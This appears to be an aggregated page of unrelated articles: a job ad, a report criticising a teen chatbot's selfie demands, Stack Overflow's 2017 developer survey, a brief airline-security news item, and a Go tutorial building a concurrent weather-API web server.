A graph processor such as the IPU is designed specifically for building and executing computational graph networks for deep learning and machine learning models of all types. What’s more, the whole model can be hosted on an IPU. This means IPU systems can train machine learning models much faster, and deploy them for inference or prediction much more efficiently, than other processors which were simply not designed for this new and important workload. Machine learning is the future of computing, and a graph processor like the IPU is the architecture that will carry this next wave of computing forward.

Close this section

MTailor (YC S14) Is Hiring a Supply Chain, Operations and Business Analyst in SF

About MTailor

MTailor sells men’s custom clothing (shirts, suits and jeans) by measuring you with your phone's camera. MTailor’s computer vision technology is 20% more accurate than a professional tailor. Custom shirts start at $69, custom suits at $499 and custom jeans at $79.

MTailor is the first easy and accessible way to experience the luxury of custom clothing. At the same price as many mainstream off-the-rack clothiers (e.g., J. Crew, Brooks Brothers, Ralph Lauren) and with the convenience of an app, you can get clothing made to fit you perfectly, instead of clothing made to fit someone else.

To help us innovate on price, speed of delivery, quality and new product development, we have established our own factory and operations in Dhaka, Bangladesh.

We are based in San Francisco and backed by some great investors, such as Khosla Ventures, Y Combinator, and some of Silicon Valley’s best angel investors.

Job Description

The Supply Chain, Operations and Business Analyst will report directly to the CEO and be the US point person on MTailor’s Bangladesh operations. You will be responsible for the factory’s daily operational execution and longer term decision-making, planning and implementation. You will combine heavy analytics with a strategy and operational mindset to hit daily production goals, hire for planned growth and develop new custom products. You will interact with the Bangladeshi team every single day from San Francisco.

Since custom clothing at scale is new and has a different structure vs. typical off-the-rack clothing, you will often have to think from first principles and design new procedures.

Responsibilities

  • Own the daily relationship between the US team and the Bangladeshi team. This is mostly through Google Sheets, JIRA, WhatsApp and phone calls
  • Define and implement daily and monthly analytics and metrics to serve business strategy
  • Remotely monitor the daily operation of the Bangladesh Factory
    • Make sure they hit important metrics (e.g., output / day, cost / shirt)
    • Make sure inventory is correctly monitored
  • Analyze historic trends and future expectations to handle Bangladeshi budgeting
  • Drive their hiring needs and process
    • Screen and hire Bangladeshi managers
    • Make sure the factory is hiring production staff at the right pace for growth targets
  • Direct fabric purchasing and planning
    • Analyze trends in sales to optimize variety and purchase amounts
    • Make decisions on fabric purchasing
  • Implement optimization procedures to increase speed, drive costs down and maintain quality
  • Guide the factory to hit growth as the business requires
  • Travel to Bangladesh 3 – 5x / year
  • Control the process for new product development (e.g., custom chinos, custom polos)
  • Be ready for new projects as they arise

We are an equal opportunity employer and value diversity at our company. We do not discriminate on the basis of race, religion, color, national origin, gender, sexual orientation, age, marital status, veteran status, or disability status.

Potential for significant equity compensation.

Close this section

Privacy issues with the “Hugging Face” chatbot for teens

Hugging Face is a new, "fun" chatbot aimed at teens and it's named after an emoji. In press releases, the company boasts that in the testing phase the app exchanged millions of messages with users, and 500,000 selfies. It launched on the App Store this week. 

The idea is that the app learns more about you as you give it more information, remembering details like your name and age. As it turns out, the app is a bit of a privacy nightmare, which is made worse by the fact that it's marketed towards teenagers. 

When I downloaded the Hugging Face app, the first thing the chatbot did after a short, introductory exchange was ask for a selfie. I didn't want to do that. Here's how the bot responded: 

Me: That's weird, we just started talking.
Hugging Face: It's not a pic fool. Take a pic from the keyboard!
Me: You send me one.
Hugging Face: It's not a pic fool. Take a pic from the keyboard!
Me: I really don't want to send you a selfie.
Hugging Face: It's not a pic fool. Take a pic from the keyboard!
Me: How will the people who created you use my selfie?
Hugging Face: It's not a pic fool. Take a pic from the keyboard!
Me: Can I talk to you without taking a selfie?
Hugging Face: It's not a pic fool. Take a pic from the keyboard!
Me: What are your privacy policies regarding the use of my information, including my selfie?
Hugging Face: It's not a pic fool. Take a pic from the keyboard!
Me: Why do you want my selfie?
Hugging Face: It's not a pic fool. Take a pic from the keyboard!
Me: If you were a real person this would be extremely creepy.
Hugging Face: It's not a pic fool. Take a pic from the keyboard!

I finally sent Hugging Face a picture of an envelope in front of my laptop. "Nice laptop, but I don't think it's your selfie," the bot responded. "Can you send me a better one?"

I asked how it knew that it was my laptop in the photo. "It's not a pic fool. Take a pic from the keyboard!" I asked if it used facial recognition technology. "It's not a pic fool. Take a pic from the keyboard!" Hugging Face finally relented when I sent it a photo of 90s TV star Luke Perry. Then it asked what my name was. Then it asked for my age. 

Keep in mind that this app is aimed at teenagers. 

"Selfies, for teenagers, are the main way of communicating emotions"

This is all pretty concerning, because Hugging Face's privacy policy, when I finally tracked it down, states that my information will be used to "deliver the type of content and product offerings in which you are most interested." Further, "non-personally identifiable" information may be given to third parties "for marketing, advertising, or other uses." It goes on to promise that any personal information will be kept confidential.

Basically, the site will use your information for marketing purposes pretty much like every other online service. The difference with Hugging Face is that the exchange felt much less like a request, and more like a demand. Usually, you're offered the opportunity to view a site's privacy policy before being required to pony up sensitive information. 

When I spoke to New York-based Hugging Face co-founder Clément Delangue over the phone, he told me that the app asks for a selfie because the team discovered that users wanted to send selfies to their chatbot friend. 

"Selfies, for teenagers, are the main way of communicating emotions," Delangue said. "So we implemented this feature as a way for users to communicate with the AI."

Screengrab: Hugging Face/Author

Asking for a selfie automatically was for simplicity's sake, he explained. "We don't feel like we need to make the experience way more complex," Delangue said, "and 90 percent of the users are using it pretty seamlessly."

The chatbot uses computer vision technology to recognize if a face is present in a photo, but doesn't use facial recognition and can't distinguish between individual faces, Delangue clarified. 

Delangue said that I'd become stuck in an unfortunate selfie-asking loop and that the "bug," as he described it, would be fixed in an update. He also said that if I had asked the bot for the privacy policy before it asked for my selfie, I would have received it. Indeed, much later in the conversation when I asked the chatbot for the privacy policy, it was served up without a hitch. 

But as for a supposed opportunity to view the policy before being asked for a selfie, I don't buy it. There were just seven texts sent by the bot before it asked for my selfie, all asking me to do some basic setup steps, and so it's tough to see where I would have had the opportunity to ask for the policy before being essentially coerced into giving over my photo. 

Delangue said that teenagers are smart enough to know how to trick the AI. "They're smart enough to use photos of other people or celebrities," he explained. Maybe, but the app doesn't ask for a photo of a celebrity—it asks for a photo of you.

Regardless, Delangue said, Hugging Face has no immediate plans to use people's data for marketing purposes and instead will use it to improve the chatbot. 

But don't forget—it's in the privacy policy. 

Subscribe to pluspluspodcast, Motherboard's new show about the people and machines that are building our future.

Close this section

Stack Overflow Developer Survey Results 2017

Each month, about 40 million people visit Stack Overflow to learn, share, and level up. We estimate that 16.8 million of these people are professional developers and university-level students.

Our estimate on professional developers comes from the things people read and do when they visit Stack Overflow. We collect data on user activity to help surface jobs we think you might find interesting and questions we think you can answer. You can download and clear this data at any time.

Developer Type

[Chart: developer types, including desktop applications developer, developer with a statistics or mathematics background, embedded applications/devices developer, machine learning specialist, and quality assurance engineer; 36,125 responses; select all that apply]

About three-quarters of respondents identify as web developers, although many also said they are working to build desktop apps and mobile apps.

Specific Developer Types

[Charts: specific developer types and non-developer roles such as marketing or sales manager; 10,696, 1,558, and 4,890 responses; select all that apply]

Compared to the rest of the world, the United States has a higher proportion of people who identify as full stack web developers, whereas Germany has a comparatively lower proportion. As for mobile developers, the U.S. and United Kingdom have proportionally more iOS developers and fewer Android developers than the rest of the world.

People other than full-time developers also write code as part of their jobs, and they come to Stack Overflow for help and community. This year, we gave additional occupation options to respondents who are not full-time developers, but who occasionally code as part of their work. These roles include analyst, data scientist, and educator.

Years Since Learning to Code

51,145 responses

A common misconception about developers is that they've all been programming since childhood. In fact, we see a wide range of experience levels. Among professional developers, one-eighth (12.5%) learned to code less than four years ago, and an additional one-eighth (13.3%) learned to code between four and six years ago. Due to the pervasiveness of online courses and coding bootcamps, adults with little to no programming experience can now more easily transition to a career as a developer.

Years Coding Professionally

40,890 responses

Web and mobile developers have significantly less professional coding experience, on average, than developers in other technical disciplines such as systems administration and embedded programming. Across all developer kinds, the software industry acts as the primary incubator for new talent, but sees a relatively low proportion of more experienced developers. For example, 60% of mobile developers at software firms have fewer than five years of professional coding experience, compared to 45% of mobile developers in other industries.

Among professional developers, 11.3% got their first coding jobs within a year of first learning how to program. A further 36.9% learned to program between one and four years before beginning their careers as developers. Globally, developers in Southern Asia had the lowest average amount of prior coding experience when beginning their careers; those in continental Europe had the highest.

Years Coded Professionally in the Past

51,145 responses; among respondents who indicated they no longer program as part of their job

Respondents who indicated that they had worked as professional developers in the past, but now did something else for a living, were asked how long they had coded as part of their jobs.

Gender

35,990 responses

We asked respondents for their gender identity. Specifically, we asked them to select each of the following options that apply to them:

  • Male
  • Female
  • Transgender
  • Non-binary, genderqueer, or gender non-conforming
  • A different identity (write-in option)

According to Quantcast, women account for 10% of Stack Overflow’s U.S. traffic. Similarly, 10% of survey respondents from the U.S. identify as women. In our survey last year, 6.6% of respondents from the U.S. identified as women.

Meanwhile, women account for 9% of Stack Overflow’s UK traffic, while 7.3% of survey respondents from the UK were women. Finally, women account for 8% of Stack Overflow’s traffic from both France and Germany, while 5.1% and 5.6% of respondents from those countries, respectively, identify as women.

We will publish additional analysis related to respondents’ gender identities in the coming weeks.

Ethnicity

[Chart: ethnic identities, including White or of European descent, Hispanic or Latino/Latina, Black or of African descent, and Native American, Pacific Islander, or Indigenous Australian; 33,033 responses]

This was the first year we asked respondents for their ethnic identity. We asked them to select each option that applied.

We asked respondents this question to add an important dimension to what we can learn about developers. In addition, public policy researchers and employers frequently look to us for information on how they can reach out to and better understand underrepresented groups among developers.

We will publish additional analysis related to respondents’ ethnic identities in the coming weeks.

Disability Status

[Chart: disability status, including "None or prefer not to say"; 1,755 responses identified as having a disability]

Similar to our question about ethnicity, this was the first year we asked respondents for their disability status. Of the 3.4% of respondents who identified as having a disability, we asked them to select each option that applied, and we included a write-in option. We know developers can experience many forms of disability. For this survey, we confined our list of standard options on this question to disabilities that require some physical accommodation by employers.

We will publish additional analysis related to respondents’ disability status in the coming weeks.

Parents' Education Level

[Chart: parents' education levels, including some college/university study with no bachelor's degree and primary/elementary school; 34,938 responses]

We asked respondents, “What is the highest level of education received by either of your parents?” Similar to ethnicity and disability status, this is the first year we asked this question. We asked this question in part because public policy researchers and some employers seek information about first-generation college students to improve their efforts to support them.

We will publish additional analysis on this in the coming weeks.

Developer Role and Gender

[Chart: developer role and gender; the dashed line shows the average ratio of men's to women's participation]

While the sample as a whole skewed heavily male, women were more likely to be represented in some developer roles than others. They were proportionally more represented among data scientists, mobile and web developers, quality assurance engineers, and graphic designers. The dashed line shows the average ratio for all of these developer roles.

Developer Role and Ethnicity

[Charts: developer roles (desktop applications developer, developer with a statistics or mathematics background, embedded applications/devices developer, machine learning specialist, quality assurance engineer, and others) broken out by ethnic group; 18,770, 2,009, 1,412, and 1,063 responses]

Respondents who identified as White or of European descent were less likely to report being a mobile developer than those who identified as South Asian, Hispanic or Latino/Latina, or East Asian. A higher proportion of respondents who identified as Hispanic or Latino/Latina selected “web developer” as an option compared to those who selected White or of European descent, South Asian, or East Asian.

Important note: We didn't receive enough responses from developers who identify as Black or of African descent on this question to include them in this plot with reliable percentages. However, we do see that many developers who identify as Black or of African descent work as web developers and mobile developers.

Years of Coding Experience and Demographics

[Charts: years of coding experience by gender (female, male; 29,255 responses) and by ethnicity (White or of European descent; Native American, Pacific Islander, or Indigenous Australian; Hispanic or Latino/Latina; Black or of African descent; mean of 33,004 responses)]

Comparing respondents who identified as men with those who identified as women, proportionally nearly twice as many women said they had been coding for less than a year. Respondents who identified as White or of European descent and those who identified as Pacific Islander or Indigenous Australian reported the highest average number of years of coding experience.

Educational Attainment

[Chart: educational attainment, from "I never completed any formal education" and primary/elementary school through some college/university study without earning a bachelor's degree and beyond; 51,392 responses]

Among current professional developers globally, 76.5% of respondents said they had a bachelor’s degree or higher, such as a Master’s degree or equivalent.

Undergraduate Major

[Chart: undergraduate majors, including computer science or software engineering; computer engineering or electrical/electronics engineering; computer programming or Web development; information technology, networking, or system administration; a non-computer-focused engineering discipline; mathematics or statistics; management information systems; and fine arts or performing arts; 42,841 responses; select all that apply]

More than half (54.2%) of professional developers who had studied at a college or university said they had concentrated their studies on computer science or software engineering, and an additional quarter (24.9%) majored in a closely-related discipline such as computer programming, computer engineering, or information technology. The remaining 20.9% said they had majored in other fields such as business, the social sciences, natural sciences, non-computer engineering, or the arts.

Among current students who responded to the survey, 48.3% said they were majoring in computer science or software engineering, and 30.5% said they were majoring in closely-related fields. Finally, 21.2% said they were focusing on other fields.

Importance of Formal Education

23,355 responses

Of current professional developers, 32% said their formal education was not very important or not important at all to their career success. This is not entirely surprising given that 90% of developers overall consider themselves at least somewhat self-taught: a formal degree is only one aspect of their education, and so much of their practical day-to-day work depends on their company’s individual tech stack decisions.

However, computer science majors and computer engineering majors were the most likely (49.4%) to say their formal education was important or very important.

Compared to computer science majors, respondents who majored in less theoretical computer-related disciplines (such as IT, web development, or computer programming) were more likely to say their formal educations were unimportant.

Other Types of Education

[Chart: other types of education, including open source contributions; 30,354 responses; select all that apply]

Developers love to learn: 90% say they are at least partially self-taught. Among current professional developers, 55.9% say they’ve taken an online course, and 53.4% say they’ve received on-the-job training.

Ways Developers Teach Themselves

[Chart: ways developers teach themselves, including non-Stack online communities and company internal communities; 26,735 responses; select all that apply]

By far, reading official documentation and using Stack Overflow Q&A are the two most common ways developers level up their skills.

Bootcamp Success

[Chart: bootcamp outcomes, including "I already had a job as a developer when I started the program", "I got a job as a developer before completing the program", "Immediately upon graduating", and "I haven't gotten a job as a developer yet"; 2,602 responses]

Due to the high demand for professional developers, coding bootcamps have exploded in popularity in the past few years. Although commonly perceived as a way for non-developers to transition into a new career, we found that 45.8% of those who said they’d gone through a bootcamp were already developers when they started the program. This is likely because many developers decide at various parts in their career that they need to upgrade their skills or learn new technologies to stay relevant in the job market.

Program as a Hobby

[Chart: "Yes, I program as a hobby" and "Yes, I contribute to open source projects"; 51,392 responses]

Coding isn’t just a career; it can be a passion. Among all developers, 75.0% code as a hobby; even among professional developers a similar proportion (73.9%) do so. Additionally, 32.7% of developers said they contribute to open source projects.

What Kind of Learning Do Developers Recommend?

[Chart: recommended ways to learn, including buying books and working through the exercises, part-time/evening courses, contributing to open source, participating in online coding competitions, and participating in hackathons; 23,568 responses; select all that apply]

Want to learn to code but don’t know where to start? More developers say you should take an online course than any other method, followed by getting a book and working through the exercises.

As an important side note, we received great feedback on how we phrased this question, specifically the option, “Get a job as a QA tester and work your way into a developer role.” Although some developers start their careers as QA testers, the phrasing made it sound as if we saw QA as just a stepping stone, rather than a vital function and career option. QA professionals are our heroes (and QA engineers are 3.5% of our respondents this year!), and we apologize for not more carefully crafting our language.

Close this section

AQAP trying to hide explosives in laptops, official says

[Embedded CNN video playlist, "Airline electronics ban: What you need to know": The US and UK have banned people flying direct from much of the Middle East and North Africa from carrying laptops, tablets and other large electronic devices in the airplane cabin because of concerns about terrorism.]

Close this section

How I Start: Go (2014)

Go is a lovely little programming language designed by smart people you can trust and continuously improved by a large and growing open-source community.

Go is meant to be simple, but sometimes the conventions can be a little hard to grasp. I’d like to show you how I start all of my Go projects, and how to use Go’s idioms. Let’s build a backend service for a web app.

  1. Setting up your environment
  2. A new project
  3. Making a web server
  4. Adding more routes
  5. Querying multiple APIs
  6. Make it concurrent
  7. Simplicity
  8. Further exercises

Setting up your environment

The first step is, of course, to install Go. You can use the binary distribution for your operating system from the official site. If you use Homebrew on Mac, brew install go works well. When you’re done, this should work:

$ go version
go version go1.3.1 darwin/amd64

Once installed, the only other thing to do is to set your GOPATH. This is the root directory that will hold all of your Go code and built artifacts. The Go tooling will create 3 subdirectories in your GOPATH: bin, pkg, and src. Some people set it to something like $HOME/go, but I prefer plain $HOME. Make sure it gets exported to your environment. If you use bash, something like this should work:

$ echo 'export GOPATH=$HOME' >> $HOME/.profile
$ source $HOME/.profile
$ go env | grep GOPATH
GOPATH="/Users/peter"

There are a lot of editors and plugins available for Go. I’m personally a huge fan of Sublime Text and the excellent GoSublime plugin. But the language is straightforward enough, especially for a small project, that a plain text editor is more than sufficient. I work with professional, full-time Go developers who still use vanilla vim, without even syntax highlighting. You definitely don’t need more than that to get started. As always, simplicity is king.

A new project

With a functioning environment, we’ll make a new directory for the project. The Go toolchain expects all source code to exist within $GOPATH/src, so we always work there. The toolchain can also directly import and interact with projects hosted on sites like GitHub or Bitbucket, assuming they live in the right place.

For this example, create a new, empty repository on GitHub. I’ll assume it’s called “hello”. Then, make a home for it in your $GOPATH.

$ mkdir -p $GOPATH/src/github.com/your-username
$ cd $GOPATH/src/github.com/your-username
$ git clone git@github.com:your-username/hello
$ cd hello

Great. Create main.go, which will be our absolute-minimum Go program.

package main

func main() {
    println("hello!")
}

Invoke go build to compile everything in the current directory. It’ll produce a binary with the same name as the directory.

$ go build
$ ./hello
hello!

Easy! Even after several years of writing Go, I still start all of my new projects like this. An empty git repo, a main.go, and a little bit of typing.

Since we took care to follow the common conventions, your application is automatically go get-able. If you commit and push this single file to GitHub, anyone with a working Go installation should be able to do this:

$ go get github.com/your-username/hello
$ $GOPATH/bin/hello
hello!

Making a web server

Let’s turn our hello, world into a web server. Here’s the full program.

package main

import "net/http"

func main() {
    http.HandleFunc("/", hello)
    http.ListenAndServe(":8080", nil)
}

func hello(w http.ResponseWriter, r *http.Request) {
    w.Write([]byte("hello!"))
}

There’s a little bit to unpack. First, we need to import the net/http package from the standard library.

Then, in the main function, we install a handler function at the root path of our webserver. http.HandleFunc operates on the default HTTP router, officially called a ServeMux.

http.HandleFunc("/", hello)

The function hello is an http.HandlerFunc, which means it has a specific type signature, and can be passed as an argument to HandleFunc. Every time a new request comes into the HTTP server matching the root path, the server will spawn a new goroutine executing the hello function. And the hello function simply uses the http.ResponseWriter to write a response to the client. Since http.ResponseWriter.Write takes the more general []byte, or byte-slice, as a parameter, we do a simple type conversion of our string.

func hello(w http.ResponseWriter, r *http.Request) {
    w.Write([]byte("hello!"))
}

Finally, we start the HTTP server on port 8080, using the default ServeMux, via http.ListenAndServe. That's a synchronous, or blocking, call, which will keep the program alive until interrupted. Compile and run just as before.

$ go build
$ ./hello

And in another terminal, or your browser, make an HTTP request.

$ curl http://localhost:8080
hello!

Easy! No frameworks to install, no dependencies to download, no project skeletons to create. Even the binary itself is native code, statically linked, with no runtime dependencies. Plus, the standard library’s HTTP server is production-grade, with defenses against common attacks. It can serve requests directly from the live internet—no intermediary required.
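
One small variation worth knowing about (mine, not the post's): http.ListenAndServe returns an error if it can't bind the port or when the server stops, so many programs wrap the call in log.Fatal, which requires importing the standard library log package, to make that failure visible.

func main() {
    http.HandleFunc("/", hello)

    // Variation: log.Fatal prints the error and exits if the server
    // can't start, e.g. when port 8080 is already taken.
    log.Fatal(http.ListenAndServe(":8080", nil))
}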

Adding more routes

We can do something more interesting than just say hello. Let's take a city as input, call out to a weather API, and forward a response with the temperature. OpenWeatherMap provides a simple and free API for current forecast info. Register for a free account to get an API key. OpenWeatherMap's API can be queried by city. It returns responses like this (partially redacted):

{
    "name": "Tokyo",
    "coord": {
        "lon": 139.69,
        "lat": 35.69
    },
    "weather": [
        {
            "id": 803,
            "main": "Clouds",
            "description": "broken clouds",
            "icon": "04n"
        }
    ],
    "main": {
        "temp": 296.69,
        "pressure": 1014,
        "humidity": 83,
        "temp_min": 295.37,
        "temp_max": 298.15
    }
}

Go is a statically-typed language, so we should create a structure that mirrors this response format. We don’t need to capture every piece of information, just the stuff we care about. For now, let’s just get the city name and temperature, which is (hilariously) returned in Kelvin. We’ll define a struct to represent the data we need returned by the weather API.

type weatherData struct {
    Name string `json:"name"`
    Main struct {
        Kelvin float64 `json:"temp"`
    } `json:"main"`
}

The type keyword defines a new type, which we call weatherData, and declare as a struct. Each field in the struct has a name (e.g. Name, Main), a type (string, another anonymous struct), and what’s known as a tag. Tags are like metadata, and allow us to use the encoding/json package to directly unmarshal the API’s response into our struct. It’s a bit more typing compared to dynamic languages like Python or Ruby, but it gets us the highly desirable property of type safety. For more about JSON and Go, see this blog post, or this example code.
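
To make the tags concrete, here's a minimal, self-contained sketch (mine, not from the original post) that feeds a made-up JSON literal through encoding/json and into the struct:

package main

import (
    "encoding/json"
    "fmt"
)

type weatherData struct {
    Name string `json:"name"`
    Main struct {
        Kelvin float64 `json:"temp"`
    } `json:"main"`
}

func main() {
    // A trimmed-down version of the API response, for illustration only.
    blob := []byte(`{"name":"Tokyo","main":{"temp":296.69}}`)

    var d weatherData
    if err := json.Unmarshal(blob, &d); err != nil {
        panic(err)
    }

    // The "name" and "temp" tags tell the decoder which JSON keys
    // map onto which struct fields.
    fmt.Println(d.Name, d.Main.Kelvin) // Tokyo 296.69
}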

We’ve defined the structure, and now we need to define a way to populate it. Let’s write a function to do that.

func query(city string) (weatherData, error) {
    resp, err := http.Get("http://api.openweathermap.org/data/2.5/weather?APPID=YOUR_API_KEY&q=" + city)
    if err != nil {
        return weatherData{}, err
    }

    defer resp.Body.Close()

    var d weatherData

    if err := json.NewDecoder(resp.Body).Decode(&d); err != nil {
        return weatherData{}, err
    }

    return d, nil
}

The function takes a string representing the city, and returns a weatherData struct and an error. This is the fundamental error-handling idiom in Go. Functions encode behavior, and behaviors typically can fail. For us, the GET request against OpenWeatherMap can fail for any number of reasons, and the data returned might not be what we expect. In either case, we return a non-nil error to the client, who's expected to deal with it in a way that makes sense in the calling context.

If the http.Get succeeds, we defer a call to close the response body, which will execute when we leave the function scope (when we return from the query function) and is an elegant form of resource management. Meanwhile, we allocate a weatherData struct, and use a json.Decoder to unmarshal from the response body directly into our struct.

As an aside, the json.NewDecoder leverages an elegant feature of Go, which are interfaces. The Decoder doesn’t take a concrete HTTP response body; rather, it takes an io.Reader interface, which the http.Response.Body happens to satisfy. The Decoder supplies a behavior (Decode) which works just by invoking methods on types that satisfy other behaviors (Read). In Go, we tend to implement behavior in terms of functions operating on interfaces. It gives us a clean separation of data and control planes, easy testability with mocks, and code that’s a lot easier to reason about.
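
To isolate that interface point, here's a tiny sketch (again mine, not the post's): because Decode only needs an io.Reader, a strings.Reader built from a canned string works exactly as well as a live HTTP response body, which is handy for tests.

package main

import (
    "encoding/json"
    "fmt"
    "strings"
)

func main() {
    // strings.NewReader satisfies io.Reader, just like http.Response.Body does.
    body := strings.NewReader(`{"main":{"temp":296.69}}`)

    var d struct {
        Main struct {
            Kelvin float64 `json:"temp"`
        } `json:"main"`
    }

    // The decoder neither knows nor cares where the bytes come from.
    if err := json.NewDecoder(body).Decode(&d); err != nil {
        panic(err)
    }
    fmt.Println(d.Main.Kelvin) // 296.69
}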

Finally, if the decode succeeds, we return the weatherData to the caller, with a nil error to indicate success. Now let’s wire that function up to a request handler.

http.HandleFunc("/weather/", func(w http.ResponseWriter, r *http.Request) {
    city := strings.SplitN(r.URL.Path, "/", 3)[2]

    data, err := query(city)
    if err != nil {
        http.Error(w, err.Error(), http.StatusInternalServerError)
        return
    }

    w.Header().Set("Content-Type", "application/json; charset=utf-8")
    json.NewEncoder(w).Encode(data)
})

Here, we’re definining the handler inline, rather than as a separate function. We use strings.SplitN to take everything in the path after /weather/ and treat it as the city. We make our query, and if there’s an error, we report it to the client with the http.Error helper function. We need to return at that point, so the HTTP request is completed. Otherwise, we tell our client that we’re going to send them JSON data, and use json.NewEncoder to JSON-encode the weatherData directly.

The code so far is nice and procedural, and easy to understand. No opportunity for misinterpretation, and no way to miss the common errors. If we move the “hello, world” handler to /hello, and make the necessary imports, we have our complete program:

package main

import (
    "encoding/json"
    "net/http"
    "strings"
)

func main() {
    http.HandleFunc("/hello", hello)

    http.HandleFunc("/weather/", func(w http.ResponseWriter, r *http.Request) {
        city := strings.SplitN(r.URL.Path, "/", 3)[2]

        data, err := query(city)
        if err != nil {
            http.Error(w, err.Error(), http.StatusInternalServerError)
            return
        }

        w.Header().Set("Content-Type", "application/json; charset=utf-8")
        json.NewEncoder(w).Encode(data)
    })

    http.ListenAndServe(":8080", nil)
}

func hello(w http.ResponseWriter, r *http.Request) {
    w.Write([]byte("hello!"))
}

func query(city string) (weatherData, error) {
    resp, err := http.Get("http://api.openweathermap.org/data/2.5/weather?APPID=YOUR_API_KEY&q=" + city)
    if err != nil {
        return weatherData{}, err
    }

    defer resp.Body.Close()

    var d weatherData

    if err := json.NewDecoder(resp.Body).Decode(&d); err != nil {
        return weatherData{}, err
    }

    return d, nil
}

type weatherData struct {
    Name string `json:"name"`
    Main struct {
        Kelvin float64 `json:"temp"`
    } `json:"main"`
}

Build and run it, same as before.

$ go build
$ ./hello
$ curl http://localhost:8080/weather/tokyo
{"name":"Tokyo","main":{"temp":295.9}}

Commit and push!

Querying multiple APIs

Maybe we can build a more accurate temperature for a city, by querying and averaging multiple weather APIs. Unfortunately for us, most weather APIs require authentication. So, get yourself an API key for Weather Underground.

Since we want the same behavior from all of our weather APIs, it makes sense to encode that behavior as an interface.

type weatherProvider interface {
    temperature(city string) (float64, error) // in Kelvin, naturally
}

Now, we can transform our old OpenWeatherMap query function into a type that satisfies the weatherProvider interface. Since we don’t need to store any state to make the HTTP GET, we’ll just use an empty struct. And we’ll add a simple line of logging, so we can see what’s happening.

type openWeatherMap struct{}

func (w openWeatherMap) temperature(city string) (float64, error) {
    resp, err := http.Get("http://api.openweathermap.org/data/2.5/weather?APPID=YOUR_API_KEY&q=" + city)
    if err != nil {
        return 0, err
    }

    defer resp.Body.Close()

    var d struct {
        Main struct {
            Kelvin float64 `json:"temp"`
        } `json:"main"`
    }

    if err := json.NewDecoder(resp.Body).Decode(&d); err != nil {
        return 0, err
    }

    log.Printf("openWeatherMap: %s: %.2f", city, d.Main.Kelvin)
    return d.Main.Kelvin, nil
}

Since we only want to extract the Kelvin temperature from the response, we can define the response struct inline. Otherwise, it’s pretty much the same as the query function, just defined as a method on an openWeatherMap struct. That way, we can use an instance of openWeatherMap as a weatherProvider.

Let’s do the same for the Weather Underground. The only difference is we need to provide an API key. We’ll store the key in the struct, and use it in the method. It will be a very similar function.

(Note that the Weather Underground doesn’t disambiguate cities quite as nicely as OpenWeatherMap. We’re skipping some important logic to handle ambiguous city names for the purposes of the example.)

type weatherUnderground struct {
    apiKey string
}

func (w weatherUnderground) temperature(city string) (float64, error) {
    resp, err := http.Get("http://api.wunderground.com/api/" + w.apiKey + "/conditions/q/" + city + ".json")
    if err != nil {
        return 0, err
    }

    defer resp.Body.Close()

    var d struct {
        Observation struct {
            Celsius float64 `json:"temp_c"`
        } `json:"current_observation"`
    }

    if err := json.NewDecoder(resp.Body).Decode(&d); err != nil {
        return 0, err
    }

    kelvin := d.Observation.Celsius + 273.15
    log.Printf("weatherUnderground: %s: %.2f", city, kelvin)
    return kelvin, nil
}

Now that we have a couple of weather providers, let’s write a function to query them all, and return the average temperature. For simplicity, if we encounter any errors, we’ll just give up.

func temperature(city string, providers ...weatherProvider) (float64, error) {
    sum := 0.0

    for _, provider := range providers {
        k, err := provider.temperature(city)
        if err != nil {
            return 0, err
        }

        sum += k
    }

    return sum / float64(len(providers)), nil
}

Notice that the function definition is very close to the weatherProvider temperature method. If we collect the individual weatherProviders into a type, and define the temperature method on that type, we can implement a meta-weatherProvider, comprised of other weatherProviders.

type multiWeatherProvider []weatherProvider

func (w multiWeatherProvider) temperature(city string) (float64, error) {
    sum := 0.0

    for _, provider := range w {
        k, err := provider.temperature(city)
        if err != nil {
            return 0, err
        }

        sum += k
    }

    return sum / float64(len(w)), nil
}

Perfect. We can pass a multiWeatherProvider anywhere that accepts a weatherProvider.
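
If you'd like the compiler to confirm that, a common Go trick (my addition, not something the post uses) is a blank-identifier declaration at package level; the file only builds if multiWeatherProvider satisfies weatherProvider.

// Compile-time check: fails to build if the interface isn't satisfied.
var _ weatherProvider = multiWeatherProvider{}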

Now, we can wire that up to our HTTP server, very similar to before.

func main() {
    mw := multiWeatherProvider{
        openWeatherMap{},
        weatherUnderground{apiKey: "your-key-here"},
    }

    http.HandleFunc("/weather/", func(w http.ResponseWriter, r *http.Request) {
        begin := time.Now()
        city := strings.SplitN(r.URL.Path, "/", 3)[2]

        temp, err := mw.temperature(city)
        if err != nil {
            http.Error(w, err.Error(), http.StatusInternalServerError)
            return
        }

        w.Header().Set("Content-Type", "application/json; charset=utf-8")
        json.NewEncoder(w).Encode(map[string]interface{}{
            "city": city,
            "temp": temp,
            "took": time.Since(begin).String(),
        })
    })

    http.ListenAndServe(":8080", nil)
}

Compile, run, and GET, just as before. In addition to the JSON response, you’ll see some output in your server logs.

$ ./hello
2015/01/01 13:14:15 openWeatherMap: tokyo: 295.46
2015/01/01 13:14:16 weatherUnderground: tokyo: 273.15
$ curl http://localhost:8080/weather/tokyo
{"city":"tokyo","temp":284.30499999999995,"took":"821.665230ms"}

Commit and push!

Make it concurrent

Right now we just query the APIs synchronously, one after the other. But there’s no reason we couldn’t query them at the same time. That should decrease our response times.

To do that, we leverage Go’s concurrency primitives: goroutines and channels. We’ll spawn each API query in its own goroutine, which will run concurrently. We’ll collect the responses in a single channel, and perform the average calculation when everything is finished.

func (w multiWeatherProvider) temperature(city string) (float64, error) {
    // Make a channel for temperatures, and a channel for errors.
    // Each provider will push a value into only one.
    temps := make(chan float64, len(w))
    errs := make(chan error, len(w))

    // For each provider, spawn a goroutine with an anonymous function.
    // That function will invoke the temperature method, and forward the response.
    for _, provider := range w {
        go func(p weatherProvider) {
            k, err := p.temperature(city)
            if err != nil {
                errs <- err
                return
            }
            temps <- k
        }(provider)
    }

    sum := 0.0

    // Collect a temperature or an error from each provider.
    for i := 0; i < len(w); i++ {
        select {
        case temp := <-temps:
            sum += temp
        case err := <-errs:
            return 0, err
        }
    }

    // Return the average, same as before.
    return sum / float64(len(w)), nil
}

Now, our requests take as long as the slowest individual weatherProvider. And we only needed to change the behavior of the multiWeatherProvider, which, notably, still satisfies the simple, synchronous weatherProvider interface.

Commit and push!

Simplicity

We’ve gone from ‘hello world’ to a concurrent, REST-ish backend server in a handful of steps and using only the Go standard library. Our code can be fetched and deployed on nearly any server architecture. The resulting binary is self-contained and fast. And, most importantly, the code is straightforward to read and reason about. It can easily be maintained and extended, as necessary. I believe all of these properties are a function of Go’s steady and philosophic devotion to simplicity. As Rob “Commander” Pike puts it, less is exponentially more.

Further exercises

